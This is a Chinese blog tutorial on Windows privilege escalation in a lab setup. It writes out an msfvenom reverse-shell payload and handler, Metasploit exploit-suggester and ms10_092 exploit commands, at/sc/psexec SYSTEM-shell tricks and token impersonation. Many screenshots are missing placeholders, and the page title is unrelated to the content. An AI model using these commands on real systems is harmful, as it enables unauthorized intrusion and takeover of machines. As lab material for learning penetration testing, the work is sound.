0
点赞
收藏
分享

微信扫一扫

ChatGPT热中的冷思考

_LEON_ 2023-05-16 阅读 108
web安全

win提权

提权目的

提高自己的执行权限,已完成更多高权限才拥有的特权

提权常用命令

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

提权实战

常见的payload利用
KB2592799
KB3000061
KB2592799
1. 安装虚拟机win2008和kali

具体安装步骤详见https://blog.csdn.net/qq_41158271/article/details/127029119?spm=1001.2014.3001.5501

在这里插入图片描述

2. 创建普通用户

在这里插入图片描述
在这里插入图片描述

net user 用户名  密码 /add    #创建用户
net user #查看已有用户

在这里插入图片描述

3. 切换用户

在这里插入图片描述

4. kali生成木马并发送到被攻击服务器上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe>shell.exe
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit

具体使用方法详见https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5502
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5. 被攻击方运行生成的木马文件

在这里插入图片描述
6. 查看监听是否连接成功并查看权限

在这里插入图片描述

7. 查看可利用漏洞

方法一:

run post/multi/recon/local_exploit_suggester   #查找可识别的漏洞

在这里插入图片描述
方法二:

run post/windows/gather/enum_patches  #查找未打补丁的漏洞

在这里插入图片描述

方法三:

下载地址:https://github.com/bitsadmin/wesng
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8. 尝试利用exp提权

在这里插入图片描述
尝试使用此漏洞提权

backgroud  #切换到后台
show sessions #查看存在的会话
search ms10_092  #查找ms10_092漏洞可利用payload
use exploit/windows/local/ms10_092_schelevator #使用payload
show options #展示设置选项
set LHOST 192.168.0.107
run #运行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
》》我这里未成功提升权限,具体步骤为上述步骤

at/sc/ps命令提权

at命令提权
at xx:xx /interactive cmd.exe  

在这里插入图片描述
在这里插入图片描述

sc命令提权
sc Create syscmd binPath = "cmd /k start" type= own type= interact #先创建服务
sc start syscmd #运行服务
ps命令提权

前提条件:需下载PsTools

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd.exe
令牌窃取提权

限制条件:win2008或2003之前版本

use incognito
list_wokens -u
impersonate_token "NT AUTHORITY/SYSTEM" #""中为令牌号
举报

相关推荐

0 条评论